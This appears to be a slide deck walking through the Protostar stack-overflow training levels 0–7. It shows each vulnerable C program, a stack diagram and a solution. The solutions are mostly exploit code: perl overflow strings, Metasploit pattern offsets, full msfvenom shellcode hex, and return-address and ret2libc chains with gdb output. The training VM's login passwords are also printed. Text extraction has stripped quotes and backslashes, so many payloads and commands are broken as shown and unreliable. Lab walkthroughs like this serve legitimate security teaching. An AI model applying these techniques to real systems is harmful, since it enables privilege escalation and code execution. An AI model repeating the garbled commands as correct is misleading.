exploit exercises.com stack-overflows

1. Exploit-Exercises.comStack OverflowsSpenser Reinhardt

2. What Is A Buffer Overflow?A buffer overflow occurs when a program or process tries tostore more data in a buffer (temporary data storage area)than it was intended to hold. Since buffers are created tocontain a finite amount of data, the extra information -which has to go somewhere - can overflow into adjacentbuffers, corrupting or overwriting the valid data held inthem. 3. Tools In UsePerl Inline perl expressions, either using $( expression ) or expression | program,depending on the need. Used to quicklyGDB GNU Debugger, allows debugging of applications, inspecting of livevariables, memory, and registers. Crash dumps know as core files can also beanalyzed in the same manors.Metasploit Console: In ../msf/toolsPattern_Create.rb Creates a specialized pattern that can be used to identifyhow many bytes into a buffer important locations are such as EIP orvariables Pattern_Offset.rb Based on a small subset of bytes returned from overflowed buffers filled with patterns from pattern_create, this locates how far into the buffer the bytes that returned are. Venom Creates shellcode, with the ability to change function, and encode shellcode to avoid bad characters and detection. 4. Preparing ProtostarIn virtual console windowLogin User: root Pass: godmodeGet an IP dhclient & ifconfig | grep inet addr 5. Preparing Protostar Cont.Loginssh [email protected][IP]Pass: userUnlimit core dumpsulimit -c unlimitedulimit -a | grep coreChange to bash shell/bin/bashChange to binary dircd /opt/protostar/bin/ 6. Level 0 (Source)int main(int argc, char **argv) {volatile int modified;char buffer[64];modified = 0;gets(buffer);if(modified != 0) {printf("you have changed the modified variablen");} else {printf("Try again?n");}} 7. Level 0 (Diagram)The Stack Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Char buffer = 64 bytesUninitalizedstack space 8. Level 0(Solution)/opt/protostar/bin$ ./stack0 test Try again?/opt/protostar/bin$ perl -e print "a"x68 | ./stack0 you have changed the modified variable 9. Level 1(source)int main(int argc, char **argv) {volatile int modified;char buffer[64];if(argc == 1) { errx(1, "please specify an argumentn");}modified = 0;strcpy(buffer, argv[1]);if(modified == 0x61626364) { printf("you have correctly got the variable to the right valuen");} else { printf("Try again, you got 0x%08xn", modified);}} 10. Level 1The Stack(Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x61626364 Char buffer = 64 bytesUninitalizedstack space 11. Level 1(Solution)./stack1 testTry again, you got 0x00000000./stack1 $(perl -e print "a"x70)Try again, you got 0x61616161./pattern_create.rb 70[MSF Pattern]./stack1 [MSF Pattern]Try again, you got 0x63413163./pattern_offset.rb 63413163 = 64 bytes./stack1 $(perl -e print "a"x64 . "x64x63x62x61nr")you have correctly got the variable to the right value 12. Level 2 (Source)int main(int argc, char **argv) { volatile int modified; char buffer[64]; char *variable;variable = getenv("GREENIE");if(variable == NULL) { errx(1, "please set the GREENIE environment variablen");}modified = 0;strcpy(buffer, variable);if(modified == 0x0d0a0d0a) { printf("you have correctly modified the variablen");} else { printf("Try again, you got 0x%08xn", modified);}} 13. Level 2The Stack(Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x0d0a0d0a Char buffer = 64 bytes Char *variableUninitalizedstack space 14. Level 2(Solution)./stack2 stack2: please set the GREENIE environment variableexport GREENIE=$(perl -e print "a"x80)./stack2 Try again, you got 0x61616161./pattern_create.rb 70[MSF Pattern]export GREENIE=[MSF locator string]./stack2 Try again, you got 0x63413163./pattern_offset.rb 63413163 = 64 bytesexport GREENIE=$(perl -e print "a"x64 . "x0ax0dx0ax0dnr")./stack2 you have correctly modified the variable 15. Level 3(Source)void win() {printf("code flow successfully changedn");}int main(int argc, char **argv) {volatile int (*fp)();char buffer[64];fp = 0;gets(buffer);if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp();}} 16. Level 3The Stack(Diagram)Previous Stack FramesContains previous EIP & ESP Int fp = 0Must point to win()Win() = 0x08048424 Char buffer = 64 bytes void win() {printf("code flow successfully changedn"); } fp = 0;Uninitalized gets(buffer);stack spaceif(fp) {printf("calling function pointer, jumping to 0x%08xn", fp);fp();} } 17. Level 3 (Solution)./stack3 Testperl -e print "a"x80 | ./stack3 calling function pointer, jumping to 0x61616161 Segmentation fault./pattern_create.rb 70[MSF Pattern]./stack3 - [MSF Pattern] calling function pointer, jumping to 0x63413163./pattern_offset.rb 63413163 = 64 bytesobjdump -d ./stack3 | grep win08048424 perl -e print "a"x64 . "x24x84x04x08nr" | ./stack3 calling function pointer, jumping to 0x08048424 code flow successfully changed 18. Level 4(Source)void win() { printf("code flow successfully changedn");}int main(int argc, char **argv) {char buffer[64];gets(buffer);} 19. Level 4The Stack (Diagram)Previous Stack FramesContains previous EIP & ESP EIP must point to win() Win() = 0x080483f4 Char buffer = 64 bytes void win() {printf("code flow successfully changedn"); }Uninitalized fp = 0;stack spacegets(buffer); if(fp) {printf("calling function pointer, jumping to 0x%08xn", fp);fp();} } 20. Level 4(Solution)./stack4 Testperl -e print "a"x80 | ./stack4 Segmentation fault./pattern_create.rb 70[MSF Pattern]Gdb quiet ./stack4Run - [MSF Pattern]Program received signal SIGSEGV, Segmentation fault.0x63413563 in ?? ()./pattern_offset.rb 63413563 = 76 bytesobjdump -d ./stack4 | grep win080483f4 perl -e print "a"x76 . "xf4x83x04x08" | ./stack4 code flow successfully changed Segmentation fault 21. Level 5(Source)int main(int argc, char **argv) {char buffer[64];gets(buffer);} 22. Level 5The Stack(Diagram)Previous Stack FramesContains previous EIP & ESPOverwritten with nop sled andShellcode.Current EIP must be overwrittento point to our shellcodeEIP = 0x08048424Char buffer = 76 bytesint main(int argc, char **argv) {Uninitalizedstack spacechar buffer[64]; gets(buffer);} 23. Level 5(Solution 1)perl -e print "a"x80 | ./stack5Segmentation fault./pattern_create.rb 80[MSF Pattern]Gdb -quiet ./stack5run[MSF Pattern]Program received signal SIGSEGV, Segmentation fault.0x63413563 in ?? ()(gdb) x $esp0xbffff7c0./pattern_offset.rb 63413563 = 76 bytesLocation of EIP = 0xbffff760 + 76h = 0xbffff7d6 24. Level 5(Solution 2)msfvenom -p linux/x86/exec -f pl -b x00xff CMD=/bin/bash PrependSetresuid=true = ~70bytesperl -e print "a"x76 . "xc0xf7xffxbf" . "x90"x16 ."xdbxd3xd9x74x24xf4x5dxbbx62x1axd1xfex2bxc9xb1x0bx83xedxfcx31x5dx16x03x5dx16xe2x97x70xdaxa6xcexd7xbax3exddxb4xcbx58x75x14xbfxcex85x02x10x6dxecxbcxe7x92xbcxa8xf0x54x40x29x2ex37x29x47x1fxc4xc1x97x08x79x98x79x7bxfd" | ./stack5Result: Program exits cleanly without executing a shell.Reason: /bin/dash has issues with the incoming stdin from the original Program. It must check for this issue and close automatically. This Is due to the gets() function being used.More Details: StackOverflow.com 25. Level 5(Solution 3)msfvenom -p linux/x86/exec -f pl -b xcox04x00xff CMD=touch /tmp/touchPrependSet resuid=trueperl -e print "a"x76 . "xc0xf7xffxbf" . "x90"x16 ."xdaxd0xbbx78xe4x7ax44xd9x74x24xf4x58x29xc9xb1x0ex31x58x17x83xc0x04x03x20xf7x98xb1xbaxfcx04xa3x68x65xddxfexefxe0xfax69xc0x81x6cx6ax76x49x0fx03xe8x1cx2cx81x1cx0fxb3x26xdcx44xdcx53xbfxccx02xb3x4bx60x33xe4xc7x15xc6x99x4fxeax7fx0dx06x0bxb2x31" | ./[email protected]:/opt/protostar/bin$ ls /tmp/touchLocal shell code for gets() - http://www.exploit-db.com/exploits/13357/ 26. Level 6(Source)void getpath(){char buffer[64];unsigned int ret;printf("input path please: ");fflush(stdout);gets(buffer);ret = __builtin_return_address(0);if((ret & 0xbf000000) == 0xbf000000) { printf("bzzzt (%p)n", ret); _exit(1);}printf("got path %sn", buffer);}int main(int argc, char **argv { getpath();} 27. Level 6The Stack(Diagram) Previous Stack Frames Current EIP Char buffer = 64 bytesUninitalizedstack space 28. Level 6The Stack(Diagram 2)This address Address of SHELLCODE Address of SHELLCODE Address of FORMATSTRING Address of execl() Address of printf() Previously EIP Char buffer = 64 bytesUninitalizedstack space 29. Level 6 (Solution 1)./pattern_create.rb 100[MSF Pattern]Gdb -quiet ./stack6RunInput path please:[MSF Pattern]got path [MSF Pattern]Program received signal SIGSEGV, Segmentation fault.0x37634136 in ?? ()./pattern_offset.rb 0x3763413680msfvenom -p linux/x86/exec -f pl -b xcox04x00xff CMD=touch/tmp/touch PrependSet resuid=true[SHELLCODE] ~ 80 bytesperl -e print "a"x80 . "xf0xf7xffxbf" . [SHELLCODE] | ./stack6input path please: bzzzt (0xbffff7f0) 30. Level 6 (Solution 2)gdb --quiet ./stack6 (gdb) break main Breakpoint 1 at 0x8048500: file stack6/stack6.c, line 27. (gdb) run Starting program: /opt/protostar/bin/stack6 Breakpoint 1, main (argc=1, argv=0xbffff864) (gdb) print printf $1 = {} 0xb7eddf90 (gdb) print execl $2 = {} 0xb7f2e460 export FORMATSTRING=%3$nexport SHELLCODE=/location/to/shellcodefile~/getenvaddr FORMATSTRING ./stack6FORMATSTRING will be at 0xbffff9a7~/getenvaddr SHELLCODE ./stack6SHELLCODE will be at 0xbffff9b6 31. Level 6 (Solution 3)(Using altered stack6 binary)~/stackx input path please: a 0xbffff75c got path agdb --quiet ~/stackx (gdb) break getpath Breakpoint 1 at 0x804848a (gdb) run Starting program: /home/user/stackx Breakpoint 1, 0x0804848a in getpath () (gdb) x/4000s $esp 0xbffff966:"/home/user/stackx" 0xbfffffea:"/home/user/stackx" 32. Level 6 (Solution 4)/home/user/stackx = 17 bytes/opt/protostar/bin/stack6 = 25 bytesDifference of = 8 bytesShows twice in mem= 16 bytes total80 x a= 80 bytes20 for other addresses= 20 bytesStarting point of = 0xbffff75cperl -e printf("0x%08xn", 0xbffff75c + 20 + 80 + 16)0Xbffff7d0 33. Level 6(Solution 5)Printf = 0xB7EDDF90Execl= 0xB7F2E460$FORMATSTRING= 0xBFFFF9A8$SHELLCODE = 0xBFFFF9B6End of buffer (here) = 0XBFFFF7D0BUFFER (80)| printf | execl | FORMATSTRING| SHELLCODE | SHELLCODE |hereperl -e print "a"x80 . "x90xdfxedxb7" . "x60xe4xf2xb7" . "xa8xf9xffxbf" ."xb6xf9xffxbf"x2 . "xd0xf7xffxbf" | ./stack6Seg fault 34. Level 7 (Source)char *getpath(){char buffer[64];unsigned int ret;printf("input path please: ");fflush(stdout);gets(buffer);ret = __builtin_return_address(0);if((ret & 0xb0000000) == 0xb0000000{printf("bzzzt (%p)n", ret);_exit(1);}printf("got path %sn", buffer);return strdup(buffer);}int main(int argc, char **argv){getpath();} 35. Level 7 (Diagram) Address of SHELLCODE Previous Stack Frames Filler buffer = 8 bytes Containsof jmp, ESP ret Address EIP & jmp, Char buffer = 80 bytes Char buffer = 80 bytesUninitalizedstack space 36. Level 7(Solution 1)./pattern_create.rb 100[MSF Pattern]gdb -quiet ./stack7input path please: [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x37634136 in ?? ()./pattern_offset.rb 0x3763413680 37. Level 7(Solution 2)scp [email protected]:/opt/protostar/bin/stack7 ~/stack7msfelfscan -j edx ~/stack7 [~/stack7]msfelfscan -p ~/stack7 [~/stack7] 0x08048492 pop ebx; pop ebp; ret 0x080485c7 pop edi; pop ebp; ret 0x080485f7 pop ebx; pop ebp; ret 38. Level 7 (Solution 3)perl -e print "a"x80 . "x92x84x04x08" . "c"x100 > /tmp/7-testgdb --quiet ./stack7 (gdb) run < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x63636363 in ?? ()./pattern_create.rb 50[MSF Pattern]perl -e print "a"x80 . "x92x84x04x08" . "[MSF Pattern] > /tmp/7-testgdb --quiet ./stack7 (gdb) run < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x33614132 in ?? () 39. Level 7 (Solution 4)./pattern_offset.rb 0x336141328perl -e print "a"x80 . "x92x84x04x08" . "C"x8 . "D"x4 > /tmp/7-testgdb --quiet ./stack7 (gdb) run < /tmp/7-test Starting program: /opt/protostar/bin/stack7 < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x44444444 in ?? ()msfvenom -p linux/x86/exec -f pl -b xcox04x00xff CMD=touch/tmp/touch PrependSet resuid=true[MSF Shellcode]export SHELLCODE=`perl -e print [MSF Shellcode]"`~/getenvaddr SHELLCODE ./stack7SHELLCODE will be at 0xbffff960 40. Level 7(Solution 4)perl -e print "a"x80 . "x92x84x04x08" . "C"x8 . "x60xf9xffxbf" | ./stack7input path please: got pathaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaCCCCCCCC`ls /tmp/ touch 41. Questions?Thanks!Exploit-exercises.com Virtual machine creatorsMattandreko.com - TutorialsHacking: The Art of Exploitation Jon Erickson